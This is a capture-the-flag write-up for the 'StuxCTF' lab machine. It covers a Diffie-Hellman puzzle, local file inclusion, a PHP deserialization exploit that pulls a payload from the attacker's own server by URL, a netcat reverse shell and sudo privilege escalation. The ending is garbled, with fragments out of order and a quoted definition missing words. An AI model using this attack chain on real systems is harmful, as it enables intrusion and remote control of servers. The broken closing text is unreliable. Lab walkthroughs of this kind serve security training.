StuxCTF
#cryptography, #linux, #serialization, #sudo
Last updated
#cryptography, #linux, #serialization, #sudo
Last updated
Date: 19/01/2025
Difficulty: Medium
CTF:
Crypto, serealization, priv scalation and more ...!
First of all, let’s test the communication with the target machine:
The value of the TTL (63) indicates that the machine may be Linux.
The scan revealed that ports 22 (SSH) and 80 (HTTP) are open. Let’s do an intensive scan on these ports to guess which services are running there:
The intensive scan shows no additional information, so let’s continue with the discovery phase.
We saw that the port 80 is open, where usually the service http is running. Let’s run whatweb tool to try to obtain info of the webpage:
It seems that the target is running Apache 2.4.18 and the OS is Ubuntu Linux.
Since we don’t have more info, let’s look at the page using the web browser
We just found a blank page… Let’s take a look to the source code:
There is a comment with interesting info there.
As I don’t really know what to do with that values, let’s continue with the enumeration of the webpage.
The target http server has the robots.txt file, and here is its content:
There is cool info here too. First of all, there is a comment “Diffie-Hellman”, and the other interesting thing is that the robots.txt is disallowing the /StuxCTF/ directory. Let’s check first if this directory exists:
So, the values we saw in the source code of the main page before, seems to be the public parameters and the secret keys of this cryptographic algorithm.
The presence of a, b and c parameters indicate that there are 3 parts in this communication. (Alice, Bob & Carol).
Knowing that, let’s try to calculate the common secret.
To do so, I will follow the following steps:
Carol has already calculated gc, so she sends it to alice.
Alice will calculate gca = gc^a mod p and send it to bob.
Bob will calculate gcab = gca^b mod p which will be the common secret.
I tried using the value of the secret as the name of the secret folder, but the page said that it doesn’t exists.
The Tryhackme machine description ask us for the 128 first digits of the common secret, so I’ll try to use it as the name of the secret folder:
And it displays a new page. It shows no much info, let’s look at the source code:
Aha! We got a hint there! It looks like we can use the parameter “file” in the URL. Let’s try to use “index.php” as the file value to check if there is LFI:
Yeah, it is including a local file. I tried with a bunch of other files but i get rather no response or an error telling me that the file doesn’t exist. Let’s take a look atthe string that appears when we include the file index.php.
Using the Cyberchef tool and after some tries, I found that the message is encoded in base 64, then reversed and finally hex encoded. Doing the reverse process, we got the content of index.php in clear text:
index.php source code
There are several interesting things in this code. First one is:
This part of the code is declaring a class named file which contains 2 parameters ($file and $data). The destruct function of this class seems to put the value of “$data” into the file “$file”. If we manage to modify the values of this parameters, we may use it to create some files in the target server that we can use to obtain a reverse shell for example.
This part of the code is checking if the file requested exists. It is also ensuring that the only valid file that can be included is “index.php”, that explains why we didn’t got any other file before. It also shows how the transformation from the php raw to hex.
And finally, this line. This seems to unserialize the content of a file. This file happens to be the $file_name, which is the value of the parameter “file” we can insert via URL.
So, if we manage to craft a payload that this line can deserialize, maybe we can exploit this vuln.
First of all, let’s see if we can request a remote file using the ?file= URL method. To do it, I’ll open a http server on my local machine:
After requesting the http://MyIP/check.php, my server gets a request, so it will be possible to request remote files.
Knowing that, I’ll prepare the code of a PHP reverse shell and share it on my http server:
minirevshell.txt
and then, I’ll prepare a file that will store the payload for the PHP Unserialize exploit
code.txt
Now, I’ll request the code.txt file via URL on the target machine: http://TargetIP/SecretFolder/?file=http://MyIP/code.txt
This will create a new file called code.php in the target machine, and its content will be a PHP code that will request the file “minirevshell.php” shared in my local http server.
Then I’ll open that code.php, so the request will take place:
http://TargetIP/SecretFolder/code.php
After doing that, I can see that the file minirevshell.php has been requested from my http server, so I’ll open netcat to receive the revshell with the command nc -lvnp 1234
And open in the web-browser the file minirevshell.php
http://TargetIP/SecretFolder/minirevshell.php
And just like that, we got the reverse shell. I’ve tried to obtain the reverse shell using other methods (like uploading the revshell code directly in the deserialize payload, but I got no success due to the double quotes, I also played with b64 encoding and some other things but nothing worked to me)
Now that we are inside the target machine, let’s find the user flag!
Now let’s escalate privileges to read the root flag!
As the user grecia had sudo permissions on everything without a password… It was very easy to acquire a root console and read the root flag.
Completed!
Mmm… It doesn’t exists. After searching the term “Diffie-Hellman” to see what it means, I found .
Diffie–Hellman (DH) key exchange is a mathematical of securely generating a symmetric over a public channel and was one of the first as conceived by and named after and .
There is a vulnerability related to PHP unserialization ()
